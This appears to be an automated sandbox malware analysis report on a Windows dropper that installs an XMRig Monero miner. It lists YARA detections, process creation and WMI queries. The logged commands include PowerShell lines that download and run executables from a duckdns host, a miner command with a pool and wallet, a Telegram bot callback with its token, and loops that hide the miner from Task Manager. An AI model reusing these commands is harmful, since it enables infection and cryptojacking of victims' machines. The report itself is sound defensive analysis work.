Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000015.00000000.1542891226.00007FF750E91000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: WinRing0x64.sys.6.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@428/22@6/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329B6F0 GetLastError,FormatMessageW,LocalFree, 0_2_00007FF73329B6F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B8284 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00007FF7332B8284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7120125 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\timeout.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;XMRIG.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;TASKMGR.EXE&apos;
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Users\user\AppData\Roaming\1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
